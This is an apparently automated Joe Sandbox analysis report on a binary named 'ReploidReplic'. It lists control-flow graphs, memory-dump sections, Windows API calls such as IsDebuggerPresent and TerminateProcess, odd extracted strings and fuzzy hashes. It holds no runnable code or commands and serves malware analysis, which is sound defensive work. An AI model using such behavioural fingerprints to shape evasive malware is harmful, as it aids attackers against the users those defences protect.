                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE0FBA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                    • String ID:
                                                                                    • API String ID: 3231365870-0
                                                                                    • Opcode ID: cc169d915891a1aed237ba7e631f89a61421948944ba941bf6f608736e20a265
                                                                                    • Instruction ID: 8fe00a6837015561fd2bf71e36515fc8bc862cc2fc3eb15ecfdfe4519d6092b6
                                                                                    • Opcode Fuzzy Hash: cc169d915891a1aed237ba7e631f89a61421948944ba941bf6f608736e20a265
                                                                                    • Instruction Fuzzy Hash: 8121D17238C2849EDB00ABB484207EA3771AB4637CF30454DD48527F81DB29443DCE9A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1560 6ce1491d-6ce14922 1561 6ce14924-6ce1493c 1560->1561 1562 6ce1494a-6ce14953 1561->1562 1563 6ce1493e-6ce14942 1561->1563 1565 6ce14965 1562->1565 1566 6ce14955-6ce14958 1562->1566 1563->1562 1564 6ce14944-6ce14948 1563->1564 1570 6ce149c3-6ce149c7 1564->1570 1569 6ce14967-6ce14974 GetStdHandle 1565->1569 1567 6ce14961-6ce14963 1566->1567 1568 6ce1495a-6ce1495f 1566->1568 1567->1569 1568->1569 1571 6ce14983 1569->1571 1572 6ce14976-6ce14978 1569->1572 1570->1561 1573 6ce149cd-6ce149d0 1570->1573 1575 6ce14985-6ce14987 1571->1575 1572->1571 1574 6ce1497a-6ce14981 GetFileType 1572->1574 1574->1575 1576 6ce149a5-6ce149b7 1575->1576 1577 6ce14989-6ce14992 1575->1577 1576->1570 1580 6ce149b9-6ce149bc 1576->1580 1578 6ce14994-6ce14998 1577->1578 1579 6ce1499a-6ce1499d 1577->1579 1578->1570 1579->1570 1581 6ce1499f-6ce149a3 1579->1581 1580->1570 1581->1570
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6CE14969
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 6CE1497B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID:
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: edfb2175fee79528a00c4f0925126772c8201229f67b5be9a71b560d84ac4320
                                                                                    • Instruction ID: 33af14a930ca7e9aada0b3b22341db9c9e462e27f0e323c0d93a1ab8adf26fa3
                                                                                    • Opcode Fuzzy Hash: edfb2175fee79528a00c4f0925126772c8201229f67b5be9a71b560d84ac4320
                                                                                    • Instruction Fuzzy Hash: 9511727270C75346DB304D3E8884A26BAB4A78723CB38275BD0B696FE1C634D5A68649

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1582 6ce15180-6ce1518b 1583 6ce15194-6ce15196 1582->1583 1584 6ce1518d-6ce15192 1582->1584 1586 6ce15198 1583->1586 1587 6ce1519f-6ce151a2 call 6ce12ee6 1583->1587 1585 6ce1519a 1584->1585 1585->1587 1586->1585 1589 6ce151a7-6ce151bd call 6ce12f43 1587->1589 1592 6ce151ea-6ce151ed 1589->1592 1593 6ce151bf-6ce151e3 call 6ce12ee6 call 6ce12f43 1589->1593 1595 6ce151f2-6ce15225 call 6ce14712 1592->1595 1593->1592 1605 6ce151e5-6ce151e9 1593->1605 1600 6ce15230 1595->1600 1601 6ce15227-6ce1522a 1595->1601 1604 6ce15237-6ce15241 1600->1604 1601->1600 1603 6ce1522c-6ce1522e 1601->1603 1603->1600 1603->1604 1604->1595 1606 6ce15243-6ce15247 1604->1606
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 485829bed7cc5e971ab4e8708c70cfb149b186606e69131c20fd7888ad078283
                                                                                    • Instruction ID: 6b83482cc0f142fb73dcbe325f32c9102323af186cad8a53e35fa2667b79f5cf
                                                                                    • Opcode Fuzzy Hash: 485829bed7cc5e971ab4e8708c70cfb149b186606e69131c20fd7888ad078283
                                                                                    • Instruction Fuzzy Hash: 7D11B672B2A6109BDF21EE2E9C05B5733B4A75677CF38061AE522DBFC0D3B4C4568680

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1607 6ce12ee6-6ce12ef1 1608 6ce12ef3-6ce12efd 1607->1608 1609 6ce12eff-6ce12f05 1607->1609 1608->1609 1610 6ce12f33-6ce12f3e call 6ce12ed3 1608->1610 1611 6ce12f07-6ce12f08 1609->1611 1612 6ce12f1e-6ce12f2f RtlAllocateHeap 1609->1612 1616 6ce12f40-6ce12f42 1610->1616 1611->1612 1613 6ce12f31 1612->1613 1614 6ce12f0a-6ce12f11 call 6ce15945 1612->1614 1613->1616 1614->1610 1620 6ce12f13-6ce12f1c call 6ce14b05 1614->1620 1620->1610 1620->1612
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CE12AE9,00000001,00000364,00000013,000000FF,?,00000001,6CE12ED8,6CE12F69,?,?,6CE1217C), ref: 6CE12F27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: e4d17636a4383aaa7edb7202fa05309bddf2e9eda9ef789657bf50f94b77d4ec
                                                                                    • Instruction ID: 336ae1bf05bf891f0b0c8431bcc6cee33228dd958333e2439c9913ba3afdfbfb
                                                                                    • Opcode Fuzzy Hash: e4d17636a4383aaa7edb7202fa05309bddf2e9eda9ef789657bf50f94b77d4ec
                                                                                    • Instruction Fuzzy Hash: CBF0243161E12467EB224B268C0EB9B3778DF67378F308021E814B6F84CB20D42582E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                    • API String ID: 0-4038474941
                                                                                    • Opcode ID: 1b9558a094cbc51ef7ad8de07ac57e9da7b309c5d51250fedc0cab29ea1a42e1
                                                                                    • Instruction ID: 91d99b6e046ea4be9000c51e45c082ec4cda1128c04f6611e42e94e0d2dc5e12
                                                                                    • Opcode Fuzzy Hash: 1b9558a094cbc51ef7ad8de07ac57e9da7b309c5d51250fedc0cab29ea1a42e1
                                                                                    • Instruction Fuzzy Hash: 8E22FDB66083519BD310CF28C885B6BBBE5FBC5314F14892DE9D5DB2A0D775D809CB82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *9`"$DYT$DYT$YX[$YX[
                                                                                    • API String ID: 0-2530561887
                                                                                    • Opcode ID: 04e240ef634c55f3b41b3a8f8676f7e5d6476ed4d973322bf4b2355f8d21a36a
                                                                                    • Instruction ID: 67edd7b7e2c29fb2d4c438ab84e1d02b5a29b2151e4e5d2887cd5302097448d4
                                                                                    • Opcode Fuzzy Hash: 04e240ef634c55f3b41b3a8f8676f7e5d6476ed4d973322bf4b2355f8d21a36a
                                                                                    • Instruction Fuzzy Hash: 18A20236B455018FCF088D7CD5D53DE3BF2AB8B364F34912AD422E7B94C12E895A8B94
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE12D62
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE12D6C
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE12D79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID: ,dPl
                                                                                    • API String ID: 3906539128-1802902484
                                                                                    • Opcode ID: 1848acbafdb78ba1fea5b01fc859ada2ce72456d96ceb60c9f53c013c900bce8
                                                                                    • Instruction ID: 73aedcca05f4eb8d68af8b86b2e6f46f367449913c49d4b0ac61ac79974f44fa
                                                                                    • Opcode Fuzzy Hash: 1848acbafdb78ba1fea5b01fc859ada2ce72456d96ceb60c9f53c013c900bce8
                                                                                    • Instruction Fuzzy Hash: 6D31E6749512189BCF21DF28DD887DCBBB8BF59314F6041EAE41CA7650E7309B958F44
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: u#6$wM2s$~8U
                                                                                    • API String ID: 0-3307174986
                                                                                    • Opcode ID: e4a3c37390dbec79d4bd562d7824e55b9af113210d7379f712aa3b2f4e3845f7
                                                                                    • Instruction ID: ffee39b4313a02463c5e193a102cc6ea90e24a790e40eb113bab99e28fefdb8d
                                                                                    • Opcode Fuzzy Hash: e4a3c37390dbec79d4bd562d7824e55b9af113210d7379f712aa3b2f4e3845f7
                                                                                    • Instruction Fuzzy Hash: 1F031F72B501118FDF18CE3CC9D53DA37F2AB43368F205659C81ADBB95C63A9A5A8F40
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE102E6
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6CE103B2
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE103D2
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6CE103DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 98e9045f9237a65670c5d08f365fd332f690b71e7500ed01616891f2c6cbaa1e
                                                                                    • Instruction ID: e1bb83bed7c2a46de20f0766ac49c471913fdb78759ef8322bb7c28a21018934
                                                                                    • Opcode Fuzzy Hash: 98e9045f9237a65670c5d08f365fd332f690b71e7500ed01616891f2c6cbaa1e
                                                                                    • Instruction Fuzzy Hash: E5313875D45258DBDB10DFA4C9897CDBBB8BF08304F1041AAE408AB640EB705A998F05
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,6CE11A64,?,00000001,?,?), ref: 6CE11A87
                                                                                    • TerminateProcess.KERNEL32(00000000,?,6CE11A64,?,00000001,?,?), ref: 6CE11A8E
                                                                                    • ExitProcess.KERNEL32 ref: 6CE11AA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 5de5caea6634d9d9df9791cdc3d5a18490f02898062d819d44827f354f226a74
                                                                                    • Instruction ID: d4736784ef7442ffafd9e46b742a1d62ec7b83f697427de51af1a2d96b2b4afe
                                                                                    • Opcode Fuzzy Hash: 5de5caea6634d9d9df9791cdc3d5a18490f02898062d819d44827f354f226a74
                                                                                    • Instruction Fuzzy Hash: 9EE0E632145148EFCF11AF94C9199E93F79FB55249B204418F50986E21CB39D9A9DB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %*+($(
                                                                                    • API String ID: 0-3907155128
                                                                                    • Opcode ID: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
                                                                                    • Instruction ID: 5e94c852aa5b79a404917453f46bfd7d03681cd594ec09a91d9c443a90b9b18e
                                                                                    • Opcode Fuzzy Hash: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
                                                                                    • Instruction Fuzzy Hash: B982A3F0E163289FDB998F18DC51B9A7BF9AB49744F2040DEA00DE7350CB761A818F59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$8
                                                                                    • API String ID: 0-46163386
                                                                                    • Opcode ID: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
                                                                                    • Instruction ID: ddf298eec4af98131b77d6fda044c0b3d0c34bd764708866622df08ba1c127fc
                                                                                    • Opcode Fuzzy Hash: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
                                                                                    • Instruction Fuzzy Hash: 597233716087509FD724CF18D884B6BBBE1FF98314F44892DF9898B292D375D988CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8qm
                                                                                    • API String ID: 0-67166220
                                                                                    • Opcode ID: 70b7cd6a2641b3afc70ace56fa6da3f66f3ecddd9bda2342d5dac15fa004037e
                                                                                    • Instruction ID: 83402c4cd90771c06d2000f34e5e3d25ff91db0ef7284d8bcc6adffaf5dcb4eb
                                                                                    • Opcode Fuzzy Hash: 70b7cd6a2641b3afc70ace56fa6da3f66f3ecddd9bda2342d5dac15fa004037e
                                                                                    • Instruction Fuzzy Hash: 2412F436B542058FCF088EFCC9913DE77F2AB4739DF249119C456EBB95C22AC90A8794
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CE192EC,?,?,00000008,?,?,6CE18F84,00000000), ref: 6CE1951E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: b6f28f7a6c9afec4ac6bc995738b416d5d96388b22dd3d4a8a2b3b399cc91942
                                                                                    • Instruction ID: 180acda7ad0e48f8ae48592fffa4ef9a3b9855a025632f31492e7e04effee6ea
                                                                                    • Opcode Fuzzy Hash: b6f28f7a6c9afec4ac6bc995738b416d5d96388b22dd3d4a8a2b3b399cc91942
                                                                                    • Instruction Fuzzy Hash: 93B116316156088FD715CF28C486B957BB1FF45368F358658E8AACFBA1C335E9A2CB40
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CE104BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: cb245e35da8936faf100d79c3cbdddc806bfb79a1b483da6820256cef5dce8cb
                                                                                    • Instruction ID: fb4b83a3296aafa33c1ff80aafe27aa977cdd34c49c5d0fd5510644a75282f5b
                                                                                    • Opcode Fuzzy Hash: cb245e35da8936faf100d79c3cbdddc806bfb79a1b483da6820256cef5dce8cb
                                                                                    • Instruction Fuzzy Hash: 74516AB2E5524A8BEF15DF56C8817AEBBF0FB49318F20856AD425EBB40D3749920CF50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: v.I/
                                                                                    • API String ID: 0-3618210467
                                                                                    • Opcode ID: da05c4b293e2b473446647fb899eacb1d4cec9358d0034ff8fc8239c7cb8ae7b
                                                                                    • Instruction ID: 4c9844a4e39c7a7eebeca451343e9fc9e05370fd711d8e5aaa20a678d16713af
                                                                                    • Opcode Fuzzy Hash: da05c4b293e2b473446647fb899eacb1d4cec9358d0034ff8fc8239c7cb8ae7b
                                                                                    • Instruction Fuzzy Hash: 8DA1C376F102098FCF04CEBCD5957DE7BF2AB4A364F248219E821E7794D23999058FA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~
                                                                                    • API String ID: 0-1707062198
                                                                                    • Opcode ID: e769d9297c58f6e36fca6eff459cd0b432d466de297f8c7a1450dff223a6a376
                                                                                    • Instruction ID: ed55a2dcb41fad3b0fb7b5dfe40954ee3c6ae32ec05102e4fd737b4913a95400
                                                                                    • Opcode Fuzzy Hash: e769d9297c58f6e36fca6eff459cd0b432d466de297f8c7a1450dff223a6a376
                                                                                    • Instruction Fuzzy Hash: 758126729042614FCB218E28989136EBB91FBD5324F19C67CECB9DB392D6348C09D7D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~
                                                                                    • API String ID: 0-1707062198
                                                                                    • Opcode ID: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
                                                                                    • Instruction ID: 7e1262662f8124fd8ea59083ef0dd2ee7c73d482a4d2bc027ba60656ccb9377a
                                                                                    • Opcode Fuzzy Hash: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
                                                                                    • Instruction Fuzzy Hash: 5751E23151C7A48AC7249A3898502EFBBE1EBE6364F244E3ED9E5C73D2D2348542D753
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 0acce41ce0ce73cbcf6530f72369f7f1975f1aa43f583f3ad3f35ba00faa7e3d
                                                                                    • Instruction ID: adc123a9f0e1be31ec42ff0a731cb3f2907a9699311b1f20bf57f016e901419c
